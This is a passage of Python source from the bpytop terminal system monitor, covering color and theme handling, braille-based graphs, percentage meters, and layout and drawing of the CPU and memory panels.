* accepts either a 6 digit hexadecimal hexa="#RRGGBB", a 2 digit hexadecimal hexa="#FF" (greyscale)
* or decimal RGB: r=0-255, g=0-255, b=0-255
* depth="fg" or "bg"
"""
dint: int = 38 if depth == "fg" else 48
color: str = ""
if hexa:
try:
if len(hexa) == 3:
c = int(hexa[1:], base=16)
color = f'\033[{dint};2;{c};{c};{c}m'
elif len(hexa) == 7:
color = f'\033[{dint};2;{int(hexa[1:3], base=16)};{int(hexa[3:5], base=16)};{int(hexa[5:7], base=16)}m'
except ValueError as e:
errlog.exception(f'{e}')
else:
color = f'\033[{dint};2;{r};{g};{b}m'
return color
@classmethod
def fg(cls, *args) -> str:
if len(args) > 2: return cls.escape_color(r=args[0], g=args[1], b=args[2], depth="fg")
else: return cls.escape_color(hexa=args[0], depth="fg")
@classmethod
def bg(cls, *args) -> str:
if len(args) > 2: return cls.escape_color(r=args[0], g=args[1], b=args[2], depth="bg")
else: return cls.escape_color(hexa=args[0], depth="bg")
class Colors:
'''Standard colors for menus and dialogs'''
default = Color("#cc")
white = Color("#ff")
red = Color("#bf3636")
green = Color("#68bf36")
blue = Color("#0fd7ff")
yellow = Color("#db8b00")
black_bg = Color("#00", depth="bg")
null = Color("")
class Theme:
'''__init__ accepts a dict containing { "color_element" : "color" }'''
themes: Dict[str, str] = {}
cached: Dict[str, Dict[str, str]] = { "Default" : DEFAULT_THEME }
current: str = ""
main_bg = main_fg = title = hi_fg = selected_bg = selected_fg = inactive_fg = proc_misc = cpu_box = mem_box = net_box = proc_box = div_line = temp_start = temp_mid = temp_end = cpu_start = cpu_mid = cpu_end = free_start = free_mid = free_end = cached_start = cached_mid = cached_end = available_start = available_mid = available_end = used_start = used_mid = used_end = download_start = download_mid = download_end = upload_start = upload_mid = upload_end = graph_text = meter_bg = process_start = process_mid = process_end = Colors.default
gradient: Dict[str, List[str]] = {
"temp" : [],
"cpu" : [],
"free" : [],
"cached" : [],
"available" : [],
"used" : [],
"download" : [],
"upload" : [],
"proc" : [],
"proc_color" : [],
"process" : [],
}
def __init__(self, theme: str):
self.refresh()
self._load_theme(theme)
def __call__(self, theme: str):
for k in self.gradient.keys(): self.gradient[k] = []
self._load_theme(theme)
def _load_theme(self, theme: str):
tdict: Dict[str, str]
if theme in self.cached:
tdict = self.cached[theme]
elif theme in self.themes:
tdict = self._load_file(self.themes[theme])
self.cached[theme] = tdict
else:
errlog.warning(f'No theme named "{theme}" found!')
theme = "Default"
CONFIG.color_theme = theme
tdict = DEFAULT_THEME
self.current = theme
#if CONFIG.color_theme != theme: CONFIG.color_theme = theme
if not "graph_text" in tdict and "inactive_fg" in tdict:
tdict["graph_text"] = tdict["inactive_fg"]
if not "meter_bg" in tdict and "inactive_fg" in tdict:
tdict["meter_bg"] = tdict["inactive_fg"]
if not "process_start" in tdict and "cpu_start" in tdict:
tdict["process_start"] = tdict["cpu_start"]
tdict["process_mid"] = tdict.get("cpu_mid", "")
tdict["process_end"] = tdict.get("cpu_end", "")
#* Get key names from DEFAULT_THEME dict to not leave any color unset if missing from theme dict
for item, value in DEFAULT_THEME.items():
default = item in ["main_fg", "main_bg"]
depth = "bg" if item in ["main_bg", "selected_bg"] else "fg"
if item in tdict:
setattr(self, item, Color(tdict[item], depth=depth, default=default))
else:
setattr(self, item, Color(value, depth=depth, default=default))
#* Create color gradients from one, two or three colors, 101 values indexed 0-100
self.proc_start, self.proc_mid, self.proc_end = self.main_fg, Colors.null, self.inactive_fg
self.proc_color_start, self.proc_color_mid, self.proc_color_end = self.inactive_fg, Colors.null, self.process_start
rgb: Dict[str, Tuple[int, int, int]]
colors: List[List[int]] = []
for name in self.gradient:
rgb = { "start" : getattr(self, f'{name}_start').dec, "mid" : getattr(self, f'{name}_mid').dec, "end" : getattr(self, f'{name}_end').dec }
colors = [ list(getattr(self, f'{name}_start')) ]
if rgb["end"][0] >= 0:
r = 50 if rgb["mid"][0] >= 0 else 100
for first, second in ["start", "mid" if r == 50 else "end"], ["mid", "end"]:
for i in range(r):
colors += [[rgb[first][n] + i * (rgb[second][n] - rgb[first][n]) // r for n in range(3)]]
if r == 100:
break
self.gradient[name] += [ Color.fg(*color) for color in colors ]
else:
c = Color.fg(*rgb["start"])
self.gradient[name] += [c] * 101
#* Set terminal colors
Term.fg = f'{self.main_fg}'
Term.bg = f'{self.main_bg}' if CONFIG.theme_background else "\033[49m"
Draw.now(self.main_fg, self.main_bg)
@classmethod
def refresh(cls):
'''Sets themes dict with names and paths to all found themes'''
cls.themes = { "Default" : "Default" }
try:
for d in (THEME_DIR, USER_THEME_DIR):
if not d: continue
for f in os.listdir(d):
if f.endswith(".theme"):
cls.themes[f'{"" if d == THEME_DIR else "+"}{f[:-6]}'] = f'{d}/{f}'
except Exception as e:
errlog.exception(str(e))
@staticmethod
def _load_file(path: str) -> Dict[str, str]:
'''Load a bashtop formatted theme file and return a dict'''
new_theme: Dict[str, str] = {}
try:
with open(path, "r") as f:
for line in f:
if not line.startswith("theme["): continue
key = line[6:line.find("]")]
s = line.find('"')
value = line[s + 1:line.find('"', s + 1)]
new_theme[key] = value
except Exception as e:
errlog.exception(str(e))
return new_theme
class Banner:
'''Holds the bpytop banner, .draw(line, [col=0], [center=False], [now=False])'''
out: List[str] = []
c_color: str = ""
length: int = 0
if not out:
for num, (color, color2, line) in enumerate(BANNER_SRC):
if len(line) > length: length = len(line)
out_var = ""
line_color = Color.fg(color)
line_color2 = Color.fg(color2)
line_dark = Color.fg(f'#{80 - num * 6}')
for n, letter in enumerate(line):
if letter == "█" and c_color != line_color:
if 5 < n < 25: c_color = line_color2
else: c_color = line_color
out_var += c_color
elif letter == " ":
letter = f'{Mv.r(1)}'
c_color = ""
elif letter != "█" and c_color != line_dark:
c_color = line_dark
out_var += line_dark
out_var += letter
out.append(out_var)
@classmethod
def draw(cls, line: int, col: int = 0, center: bool = False, now: bool = False):
out: str = ""
if center: col = Term.width // 2 - cls.length // 2
for n, o in enumerate(cls.out):
out += f'{Mv.to(line + n, col)}{o}'
out += f'{Term.fg}'
if now: Draw.out(out)
else: return out
class Symbol:
h_line: str = "─"
v_line: str = "│"
left_up: str = "┌"
right_up: str = "┐"
left_down: str = "└"
right_down: str = "┘"
title_left: str = "┤"
title_right: str = "├"
div_up: str = "┬"
div_down: str = "┴"
graph_up: Dict[float, str] = {
0.0 : " ", 0.1 : "⢀", 0.2 : "⢠", 0.3 : "⢰", 0.4 : "⢸",
1.0 : "⡀", 1.1 : "⣀", 1.2 : "⣠", 1.3 : "⣰", 1.4 : "⣸",
2.0 : "⡄", 2.1 : "⣄", 2.2 : "⣤", 2.3 : "⣴", 2.4 : "⣼",
3.0 : "⡆", 3.1 : "⣆", 3.2 : "⣦", 3.3 : "⣶", 3.4 : "⣾",
4.0 : "⡇", 4.1 : "⣇", 4.2 : "⣧", 4.3 : "⣷", 4.4 : "⣿"
}
graph_up_small = graph_up.copy()
graph_up_small[0.0] = "\033[1C"
graph_down: Dict[float, str] = {
0.0 : " ", 0.1 : "⠈", 0.2 : "⠘", 0.3 : "⠸", 0.4 : "⢸",
1.0 : "⠁", 1.1 : "⠉", 1.2 : "⠙", 1.3 : "⠹", 1.4 : "⢹",
2.0 : "⠃", 2.1 : "⠋", 2.2 : "⠛", 2.3 : "⠻", 2.4 : "⢻",
3.0 : "⠇", 3.1 : "⠏", 3.2 : "⠟", 3.3 : "⠿", 3.4 : "⢿",
4.0 : "⡇", 4.1 : "⡏", 4.2 : "⡟", 4.3 : "⡿", 4.4 : "⣿"
}
graph_down_small = graph_down.copy()
graph_down_small[0.0] = "\033[1C"
meter: str = "■"
up: str = "↑"
down: str = "↓"
left: str = "←"
right: str = "→"
enter: str = "↲"
ok: str = f'{Color.fg("#30ff50")}√{Color.fg("#cc")}'
fail: str = f'{Color.fg("#ff3050")}!{Color.fg("#cc")}'
class Graph:
'''Class for creating and adding to graphs
* __str__ : returns graph as a string
* add(value: int) : adds a value to graph and returns it as a string
* __call__ : same as add
'''
out: str
width: int
height: int
graphs: Dict[bool, List[str]]
colors: List[str]
invert: bool
max_value: int
color_max_value: int
offset: int
current: bool
last: int
symbol: Dict[float, str]
def __init__(self, width: int, height: int, color: Union[List[str], Color, None], data: List[int], invert: bool = False, max_value: int = 0, offset: int = 0, color_max_value: Union[int, None] = None):
self.graphs: Dict[bool, List[str]] = {False : [], True : []}
self.current: bool = True
self.width = width
self.height = height
self.invert = invert
self.offset = offset
if not data: data = [0]
if max_value:
self.max_value = max_value
data = [ min(100, (v + offset) * 100 // (max_value + offset)) for v in data ] #* Convert values to percentage values of max_value with max_value as ceiling
else:
self.max_value = 0
if color_max_value:
self.color_max_value = color_max_value
else:
self.color_max_value = self.max_value
if self.color_max_value and self.max_value:
color_scale = int(100.0 * self.max_value / self.color_max_value)
else:
color_scale = 100
self.colors: List[str] = []
if isinstance(color, list) and height > 1:
for i in range(1, height + 1): self.colors.insert(0, color[min(100, i * color_scale // height)]) #* Calculate colors of graph
if invert: self.colors.reverse()
elif isinstance(color, Color) and height > 1:
self.colors = [ f'{color}' for _ in range(height) ]
else:
if isinstance(color, list): self.colors = color
elif isinstance(color, Color): self.colors = [ f'{color}' for _ in range(101) ]
if self.height == 1:
self.symbol = Symbol.graph_down_small if invert else Symbol.graph_up_small
else:
self.symbol = Symbol.graph_down if invert else Symbol.graph_up
value_width: int = ceil(len(data) / 2)
filler: str = ""
if value_width > width: #* If the given data set is bigger than the width of the graph, shrink the data set
data = data[-(width*2):]
value_width = ceil(len(data) / 2)
elif value_width < width: #* If the given data set is smaller than the width of the graph, pad the graph with whitespace
filler = self.symbol[0.0] * (width - value_width)
if len(data) % 2: data.insert(0, 0)
for _ in range(height):
for b in [True, False]:
self.graphs[b].append(filler)
self._create(data, new=True)
def _create(self, data: List[int], new: bool = False):
h_high: int
h_low: int
value: Dict[str, int] = { "left" : 0, "right" : 0 }
val: int
side: str
#* Create the graph
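#* Each braille symbol encodes two samples: the integer part of the lookup key is the height (0-4) of the left dot column and the tenths digit the height of the right column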
for h in range(self.height):
h_high = round(100 * (self.height - h) / self.height) if self.height > 1 else 100
h_low = round(100 * (self.height - (h + 1)) / self.height) if self.height > 1 else 0
for v in range(len(data)):
if new: self.current = bool(v % 2) #* Switch between True and False graphs
if new and v == 0: self.last = 0
for val, side in [self.last, "left"], [data[v], "right"]: # type: ignore
if val >= h_high:
value[side] = 4
elif val <= h_low:
value[side] = 0
else:
if self.height == 1: value[side] = round(val * 4 / 100 + 0.5)
else: value[side] = round((val - h_low) * 4 / (h_high - h_low) + 0.1)
if new: self.last = data[v]
self.graphs[self.current][h] += self.symbol[float(value["left"] + value["right"] / 10)]
if data: self.last = data[-1]
self.out = ""
if self.height == 1:
self.out += f'{"" if not self.colors else self.colors[self.last]}{self.graphs[self.current][0]}'
elif self.height > 1:
for h in range(self.height):
if h > 0: self.out += f'{Mv.d(1)}{Mv.l(self.width)}'
self.out += f'{"" if not self.colors else self.colors[h]}{self.graphs[self.current][h if not self.invert else (self.height - 1) - h]}'
if self.colors: self.out += f'{Term.fg}'
def __call__(self, value: Union[int, None] = None) -> str:
if not isinstance(value, int): return self.out
self.current = not self.current
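#* Two buffers are kept and alternated; on each new value the active buffer is shifted one cell to the left before _create() appends the new column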
if self.height == 1:
if self.graphs[self.current][0].startswith(self.symbol[0.0]):
self.graphs[self.current][0] = self.graphs[self.current][0].replace(self.symbol[0.0], "", 1)
else:
self.graphs[self.current][0] = self.graphs[self.current][0][1:]
else:
for n in range(self.height):
self.graphs[self.current][n] = self.graphs[self.current][n][1:]
if self.max_value: value = (value + self.offset) * 100 // (self.max_value + self.offset) if value < self.max_value else 100
self._create([value])
return self.out
def add(self, value: Union[int, None] = None) -> str:
return self.__call__(value)
def __str__(self):
return self.out
def __repr__(self):
return repr(self.out)
class Graphs:
'''Holds all graphs and lists of graphs for dynamically created graphs'''
cpu: Dict[str, Graph] = {}
cores: List[Graph] = [NotImplemented] * THREADS
temps: List[Graph] = [NotImplemented] * (THREADS + 1)
net: Dict[str, Graph] = {}
detailed_cpu: Graph = NotImplemented
detailed_mem: Graph = NotImplemented
pid_cpu: Dict[int, Graph] = {}
class Meter:
'''Creates a percentage meter
__init__(value, width, theme, gradient_name) to create new meter
__call__(value) to set value and return meter as a string
__str__ returns last set meter as a string
'''
out: str
color_gradient: List[str]
color_inactive: Color
gradient_name: str
width: int
invert: bool
saved: Dict[int, str]
def __init__(self, value: int, width: int, gradient_name: str, invert: bool = False):
self.gradient_name = gradient_name
self.color_gradient = THEME.gradient[gradient_name]
self.color_inactive = THEME.meter_bg
self.width = width
self.saved = {}
self.invert = invert
self.out = self._create(value)
def __call__(self, value: Union[int, None]) -> str:
if not isinstance(value, int): return self.out
if value > 100: value = 100
elif value < 0: value = 0
if value in self.saved:
self.out = self.saved[value]
else:
self.out = self._create(value)
return self.out
def __str__(self) -> str:
return self.out
def __repr__(self):
return repr(self.out)
def _create(self, value: int) -> str:
if value > 100: value = 100
elif value < 0: value = 0
out: str = ""
for i in range(1, self.width + 1):
if value >= round(i * 100 / self.width):
out += f'{self.color_gradient[round(i * 100 / self.width) if not self.invert else round(100 - (i * 100 / self.width))]}{Symbol.meter}'
else:
out += self.color_inactive(Symbol.meter * (self.width + 1 - i))
break
else:
out += f'{Term.fg}'
if not value in self.saved:
self.saved[value] = out
return out
class Meters:
cpu: Meter
battery: Meter
mem: Dict[str, Union[Meter, Graph]] = {}
swap: Dict[str, Union[Meter, Graph]] = {}
disks_used: Dict[str, Meter] = {}
disks_free: Dict[str, Meter] = {}
class Box:
'''Box class with all needed attributes for create_box() function'''
name: str
height_p: int
width_p: int
x: int
y: int
width: int
height: int
proc_mode: bool = (CONFIG.view_mode == "proc" and not ARG_MODE) or ARG_MODE == "proc"
stat_mode: bool = (CONFIG.view_mode == "stat" and not ARG_MODE) or ARG_MODE == "stat"
out: str
bg: str
_b_cpu_h: int
_b_mem_h: int
redraw_all: bool
buffers: List[str] = []
clock_on: bool = False
clock: str = ""
clock_len: int = 0
resized: bool = False
clock_custom_format: Dict[str, Any] = {
"/host" : os.uname()[1],
"/user" : os.environ.get("USER") or pwd.getpwuid(os.getuid())[0],
}
if clock_custom_format["/host"].endswith(".local"):
clock_custom_format["/host"] = clock_custom_format["/host"].replace(".local", "")
@classmethod
def calc_sizes(cls):
'''Calculate sizes of boxes'''
for sub in cls.__subclasses__():
sub._calc_size() # type: ignore
sub.resized = True # type: ignore
@classmethod
def draw_update_ms(cls, now: bool = True):
update_string: str = f'{CONFIG.update_ms}ms'
xpos: int = CpuBox.x + CpuBox.width - len(update_string) - 15
if not "+" in Key.mouse:
Key.mouse["+"] = [[xpos + 7 + i, CpuBox.y] for i in range(3)]
Key.mouse["-"] = [[CpuBox.x + CpuBox.width - 4 + i, CpuBox.y] for i in range(3)]
Draw.buffer("update_ms!" if now and not Menu.active else "update_ms",
f'{Mv.to(CpuBox.y, xpos)}{THEME.cpu_box(Symbol.h_line * 7, Symbol.title_left)}{Fx.b}{THEME.hi_fg("+")} ',
f'{THEME.title(update_string)} {THEME.hi_fg("-")}{Fx.ub}{THEME.cpu_box(Symbol.title_right)}', only_save=Menu.active, once=True)
if now and not Menu.active:
Draw.clear("update_ms")
if CONFIG.show_battery and hasattr(psutil, "sensors_battery") and psutil.sensors_battery():
Draw.out("battery")
@classmethod
def draw_clock(cls, force: bool = False):
out: str = ""
if force: pass
elif not cls.clock_on or Term.resized or strftime(CONFIG.draw_clock) == cls.clock: return
clock_string = cls.clock = strftime(CONFIG.draw_clock)
for custom in cls.clock_custom_format:
if custom in clock_string:
clock_string = clock_string.replace(custom, cls.clock_custom_format[custom])
clock_len = len(clock_string[:(CpuBox.width-56)])
if cls.clock_len != clock_len and not CpuBox.resized:
out = f'{Mv.to(CpuBox.y, ((CpuBox.width)//2)-(cls.clock_len//2))}{Fx.ub}{THEME.cpu_box}{Symbol.h_line * cls.clock_len}'
cls.clock_len = clock_len
now: bool = False if Menu.active else not force
out += (f'{Mv.to(CpuBox.y, ((CpuBox.width)//2)-(clock_len//2))}{Fx.ub}{THEME.cpu_box}'
f'{Symbol.title_left}{Fx.b}{THEME.title(clock_string[:clock_len])}{Fx.ub}{THEME.cpu_box}{Symbol.title_right}{Term.fg}')
Draw.buffer("clock", out, z=1, now=now, once=not force, only_save=Menu.active)
if now and not Menu.active:
if CONFIG.show_battery and hasattr(psutil, "sensors_battery") and psutil.sensors_battery():
Draw.out("battery")
@classmethod
def draw_bg(cls, now: bool = True):
'''Draw all boxes outlines and titles'''
Draw.buffer("bg", "".join(sub._draw_bg() for sub in cls.__subclasses__()), now=now, z=1000, only_save=Menu.active, once=True) # type: ignore
cls.draw_update_ms(now=now)
if CONFIG.draw_clock: cls.draw_clock(force=True)
class SubBox:
box_x: int = 0
box_y: int = 0
box_width: int = 0
box_height: int = 0
box_columns: int = 0
column_size: int = 0
class CpuBox(Box, SubBox):
name = "cpu"
x = 1
y = 1
height_p = 32
width_p = 100
resized: bool = True
redraw: bool = False
buffer: str = "cpu"
battery_percent: int = 1000
battery_secs: int = 0
battery_status: str = "Unknown"
old_battery_pos = 0
old_battery_len = 0
battery_path: Union[str, None] = ""
battery_clear: bool = False
battery_symbols: Dict[str, str] = {"Charging": "▲",
"Discharging": "▼",
"Full": "■",
"Not charging": "■"}
clock_block: bool = True
Box.buffers.append(buffer)
@classmethod
def _calc_size(cls):
cpu = CpuCollector
height_p: int
if cls.proc_mode: height_p = 20
else: height_p = cls.height_p
cls.width = round(Term.width * cls.width_p / 100)
cls.height = round(Term.height * height_p / 100)
if cls.height < 8: cls.height = 8
Box._b_cpu_h = cls.height
#THREADS = 64
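#* Fit all threads into the cpu sub-box: box_columns is the number of core columns needed for the available height, column_size (2/1/0) picks how much per-core detail fits the width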
cls.box_columns = ceil((THREADS + 1) / (cls.height - 5))
if cls.box_columns * (20 + 13 if cpu.got_sensors else 21) < cls.width - (cls.width // 3):
cls.column_size = 2
cls.box_width = (20 + 13 if cpu.got_sensors else 21) * cls.box_columns - ((cls.box_columns - 1) * 1)
elif cls.box_columns * (15 + 6 if cpu.got_sensors else 15) < cls.width - (cls.width // 3):
cls.column_size = 1
cls.box_width = (15 + 6 if cpu.got_sensors else 15) * cls.box_columns - ((cls.box_columns - 1) * 1)
elif cls.box_columns * (8 + 6 if cpu.got_sensors else 8) < cls.width - (cls.width // 3):
cls.column_size = 0
else:
cls.box_columns = (cls.width - cls.width // 3) // (8 + 6 if cpu.got_sensors else 8); cls.column_size = 0
if cls.column_size == 0: cls.box_width = (8 + 6 if cpu.got_sensors else 8) * cls.box_columns + 1
cls.box_height = ceil(THREADS / cls.box_columns) + 4
if cls.box_height > cls.height - 2: cls.box_height = cls.height - 2
cls.box_x = (cls.width - 1) - cls.box_width
cls.box_y = cls.y + ceil((cls.height - 2) / 2) - ceil(cls.box_height / 2) + 1
@classmethod
def _draw_bg(cls) -> str:
if not "M" in Key.mouse:
Key.mouse["M"] = [[cls.x + 10 + i, cls.y] for i in range(6)]
return (f'{create_box(box=cls, line_color=THEME.cpu_box)}'
f'{Mv.to(cls.y, cls.x + 10)}{THEME.cpu_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg("M")}{THEME.title("enu")}{Fx.ub}{THEME.cpu_box(Symbol.title_right)}'
f'{create_box(x=cls.box_x, y=cls.box_y, width=cls.box_width, height=cls.box_height, line_color=THEME.div_line, fill=False, title=CPU_NAME[:cls.box_width - 14] if not CONFIG.custom_cpu_name else CONFIG.custom_cpu_name[:cls.box_width - 14])}')
@classmethod
def battery_activity(cls) -> bool:
if not hasattr(psutil, "sensors_battery") or psutil.sensors_battery() == None:
if cls.battery_percent != 1000:
cls.battery_clear = True
return False
if cls.battery_path == "":
cls.battery_path = None
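#* Try to locate a battery entry in sysfs so the charging status can be read from its status file instead of relying on psutil alone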
if os.path.isdir("/sys/class/power_supply"):
for directory in sorted(os.listdir("/sys/class/power_supply")):
if directory.startswith('BAT') or 'battery' in directory.lower():
cls.battery_path = f'/sys/class/power_supply/{directory}/'
break
return_true: bool = False
percent: int = ceil(getattr(psutil.sensors_battery(), "percent", 0))
if percent != cls.battery_percent:
cls.battery_percent = percent
return_true = True
seconds: int = getattr(psutil.sensors_battery(), "secsleft", 0)
if seconds != cls.battery_secs:
cls.battery_secs = seconds
return_true = True
status: str = "not_set"
if cls.battery_path:
status = readfile(cls.battery_path + "status", default="not_set")
if status == "not_set" and getattr(psutil.sensors_battery(), "power_plugged", None) == True:
status = "Charging" if cls.battery_percent < 100 else "Full"
elif status == "not_set" and getattr(psutil.sensors_battery(), "power_plugged", None) == False:
status = "Discharging"
elif status == "not_set":
status = "Unknown"
if status != cls.battery_status:
cls.battery_status = status
return_true = True
return return_true or cls.resized or cls.redraw or Menu.active
@classmethod
def _draw_fg(cls):
cpu = CpuCollector
if cpu.redraw: cls.redraw = True
out: str = ""
out_misc: str = ""
lavg: str = ""
x, y, w, h = cls.x + 1, cls.y + 1, cls.width - 2, cls.height - 2
bx, by, bw, bh = cls.box_x + 1, cls.box_y + 1, cls.box_width - 2, cls.box_height - 2
hh: int = ceil(h / 2)
hide_cores: bool = (cpu.cpu_temp_only or not CONFIG.show_coretemp) and cpu.got_sensors
ct_width: int = (max(6, 6 * cls.column_size)) * hide_cores
if cls.resized or cls.redraw:
if not "m" in Key.mouse:
Key.mouse["m"] = [[cls.x + 16 + i, cls.y] for i in range(12)]
out_misc += f'{Mv.to(cls.y, cls.x + 16)}{THEME.cpu_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg("m")}{THEME.title}ode:{ARG_MODE or CONFIG.view_mode}{Fx.ub}{THEME.cpu_box(Symbol.title_right)}'
Graphs.cpu["up"] = Graph(w - bw - 3, hh, THEME.gradient["cpu"], cpu.cpu_usage[0])
Graphs.cpu["down"] = Graph(w - bw - 3, h - hh, THEME.gradient["cpu"], cpu.cpu_usage[0], invert=True)
Meters.cpu = Meter(cpu.cpu_usage[0][-1], bw - (21 if cpu.got_sensors else 9), "cpu")
if cls.column_size > 0 or ct_width > 0:
for n in range(THREADS):
Graphs.cores[n] = Graph(5 * cls.column_size + ct_width, 1, None, cpu.cpu_usage[n + 1])
if cpu.got_sensors:
Graphs.temps[0] = Graph(5, 1, None, cpu.cpu_temp[0], max_value=cpu.cpu_temp_crit, offset=-23)
if cls.column_size > 1:
for n in range(1, THREADS + 1):
if not cpu.cpu_temp[n]:
continue
Graphs.temps[n] = Graph(5, 1, None, cpu.cpu_temp[n], max_value=cpu.cpu_temp_crit, offset=-23)
Draw.buffer("cpu_misc", out_misc, only_save=True)
if CONFIG.show_battery and cls.battery_activity():
bat_out: str = ""
if cls.battery_secs > 0:
battery_time: str = f' {cls.battery_secs // 3600:02}:{(cls.battery_secs % 3600) // 60:02}'
else:
battery_time = ""
if not hasattr(Meters, "battery") or cls.resized:
Meters.battery = Meter(cls.battery_percent, 10, "cpu", invert=True)
battery_symbol: str = cls.battery_symbols.get(cls.battery_status, "○")
battery_len: int = len(f'{CONFIG.update_ms}') + (11 if cls.width >= 100 else 0) + len(battery_time) + len(f'{cls.battery_percent}')
battery_pos = cls.width - battery_len - 17
if (battery_pos != cls.old_battery_pos or battery_len != cls.old_battery_len) and cls.old_battery_pos > 0 and not cls.resized:
bat_out += f'{Mv.to(y-1, cls.old_battery_pos)}{THEME.cpu_box(Symbol.h_line*(cls.old_battery_len+4))}'
cls.old_battery_pos, cls.old_battery_len = battery_pos, battery_len
bat_out += (f'{Mv.to(y-1, battery_pos)}{THEME.cpu_box(Symbol.title_left)}{Fx.b}{THEME.title}BAT{battery_symbol} {cls.battery_percent}%'+
("" if cls.width < 100 else f' {Fx.ub}{Meters.battery(cls.battery_percent)}{Fx.b}') +
f'{THEME.title}{battery_time}{Fx.ub}{THEME.cpu_box(Symbol.title_right)}')
Draw.buffer("battery", f'{bat_out}{Term.fg}', only_save=Menu.active)
elif cls.battery_clear:
out += f'{Mv.to(y-1, cls.old_battery_pos)}{THEME.cpu_box(Symbol.h_line*(cls.old_battery_len+4))}'
cls.battery_clear = False
cls.battery_percent = 1000
cls.battery_secs = 0
cls.battery_status = "Unknown"
cls.old_battery_pos = 0
cls.old_battery_len = 0
cls.battery_path = ""
Draw.clear("battery", saved=True)
cx = cy = cc = 0
ccw = (bw + 1) // cls.box_columns
if cpu.cpu_freq:
freq: str = f'{cpu.cpu_freq} MHz' if cpu.cpu_freq < 1000 else f'{float(cpu.cpu_freq / 1000):.1f} GHz'
out += f'{Mv.to(by - 1, bx + bw - 9)}{THEME.div_line(Symbol.title_left)}{Fx.b}{THEME.title(freq)}{Fx.ub}{THEME.div_line(Symbol.title_right)}'
out += (f'{Mv.to(y, x)}{Graphs.cpu["up"](None if cls.resized else cpu.cpu_usage[0][-1])}{Mv.to(y + hh, x)}{Graphs.cpu["down"](None if cls.resized else cpu.cpu_usage[0][-1])}'
f'{THEME.main_fg}{Mv.to(by + cy, bx + cx)}{Fx.b}{"CPU "}{Fx.ub}{Meters.cpu(cpu.cpu_usage[0][-1])}'
f'{THEME.gradient["cpu"][cpu.cpu_usage[0][-1]]}{cpu.cpu_usage[0][-1]:>4}{THEME.main_fg}%')
if cpu.got_sensors:
out += (f'{THEME.inactive_fg} ⡀⡀⡀⡀⡀{Mv.l(5)}{THEME.gradient["temp"][min_max(cpu.cpu_temp[0][-1], 0, cpu.cpu_temp_crit) * 100 // cpu.cpu_temp_crit]}{Graphs.temps[0](None if cls.resized else cpu.cpu_temp[0][-1])}'
f'{cpu.cpu_temp[0][-1]:>4}{THEME.main_fg}°C')
cy += 1
for n in range(1, THREADS + 1):
out += f'{THEME.main_fg}{Mv.to(by + cy, bx + cx)}{Fx.b + "C" + Fx.ub if THREADS < 100 else ""}{str(n):<{2 if cls.column_size == 0 else 3}}'
if cls.column_size > 0 or ct_width > 0:
out += f'{THEME.inactive_fg}{"⡀" * (5 * cls.column_size + ct_width)}{Mv.l(5 * cls.column_size + ct_width)}{THEME.gradient["cpu"][cpu.cpu_usage[n][-1]]}{Graphs.cores[n-1](None if cls.resized else cpu.cpu_usage[n][-1])}'
else:
out += f'{THEME.gradient["cpu"][cpu.cpu_usage[n][-1]]}'
out += f'{cpu.cpu_usage[n][-1]:>{3 if cls.column_size < 2 else 4}}{THEME.main_fg}%'
if cpu.got_sensors and cpu.cpu_temp[n] and not hide_cores:
if cls.column_size > 1:
out += f'{THEME.inactive_fg} ⡀⡀⡀⡀⡀{Mv.l(5)}{THEME.gradient["temp"][100 if cpu.cpu_temp[n][-1] >= cpu.cpu_temp_crit else (cpu.cpu_temp[n][-1] * 100 // cpu.cpu_temp_crit)]}{Graphs.temps[n](None if cls.resized else cpu.cpu_temp[n][-1])}'
else:
out += f'{THEME.gradient["temp"][100 if cpu.cpu_temp[n][-1] >= cpu.cpu_temp_crit else (cpu.cpu_temp[n][-1] * 100 // cpu.cpu_temp_crit)]}'
out += f'{cpu.cpu_temp[n][-1]:>4}{THEME.main_fg}°C'
elif cpu.got_sensors and not hide_cores:
out += f'{Mv.r(max(6, 6 * cls.column_size))}'
out += f'{THEME.div_line(Symbol.v_line)}'
cy += 1
if cy > ceil(THREADS/cls.box_columns) and n != THREADS:
cc += 1; cy = 1; cx = ccw * cc
if cc == cls.box_columns: break
if cy < bh - 1: cy = bh - 1
if cy < bh and cc < cls.box_columns:
if cls.column_size == 2 and cpu.got_sensors:
lavg = f' Load AVG: {" ".join(str(l) for l in cpu.load_avg):^19.19}'
elif cls.column_size == 2 or (cls.column_size == 1 and cpu.got_sensors):
lavg = f'LAV: {" ".join(str(l) for l in cpu.load_avg):^14.14}'
elif cls.column_size == 1 or (cls.column_size == 0 and cpu.got_sensors):
lavg = f'L {" ".join(str(round(l, 1)) for l in cpu.load_avg):^11.11}'
else:
lavg = f'{" ".join(str(round(l, 1)) for l in cpu.load_avg[:2]):^7.7}'
out += f'{Mv.to(by + cy, bx + cx)}{THEME.main_fg}{lavg}{THEME.div_line(Symbol.v_line)}'
out += f'{Mv.to(y + h - 1, x + 1)}{THEME.graph_text}up {cpu.uptime}'
Draw.buffer(cls.buffer, f'{out_misc}{out}{Term.fg}', only_save=Menu.active)
cls.resized = cls.redraw = cls.clock_block = False
class MemBox(Box):
name = "mem"
height_p = 38
width_p = 45
x = 1
y = 1
mem_meter: int = 0
mem_size: int = 0
disk_meter: int = 0
divider: int = 0
mem_width: int = 0
disks_width: int = 0
graph_height: int
resized: bool = True
redraw: bool = False
buffer: str = "mem"
swap_on: bool = CONFIG.show_swap
Box.buffers.append(buffer)
mem_names: List[str] = ["used", "available", "cached", "free"]
swap_names: List[str] = ["used", "free"]
@classmethod
def _calc_size(cls):
width_p: int; height_p: int
if cls.stat_mode:
width_p, height_p = 100, cls.height_p
else:
width_p, height_p = cls.width_p, cls.height_p
cls.width = round(Term.width * width_p / 100)
cls.height = round(Term.height * height_p / 100) + 1
Box._b_mem_h = cls.height
cls.y = Box._b_cpu_h + 1
if CONFIG.show_disks:
cls.mem_width = ceil((cls.width - 3) / 2)
cls.disks_width = cls.width - cls.mem_width - 3
if cls.mem_width + cls.disks_width < cls.width - 2: cls.mem_width += 1
cls.divider = cls.x + cls.mem_width
else:
cls.mem_width = cls.width - 1
item_height: int = 6 if cls.swap_on and not CONFIG.swap_disk else 4
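#* Pick layout density from available space: mem_size 3 uses two lines per entry, 2 one line with a short label, 1 a single-letter label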
if cls.height - (3 if cls.swap_on and not CONFIG.swap_disk else 2) > 2 * item_height: cls.mem_size = 3
elif cls.mem_width > 25: cls.mem_size = 2
else: cls.mem_size = 1
cls.mem_meter = cls.width - (cls.disks_width if CONFIG.show_disks else 0) - (9 if cls.mem_size > 2 else 20)
if cls.mem_size == 1: cls.mem_meter += 6
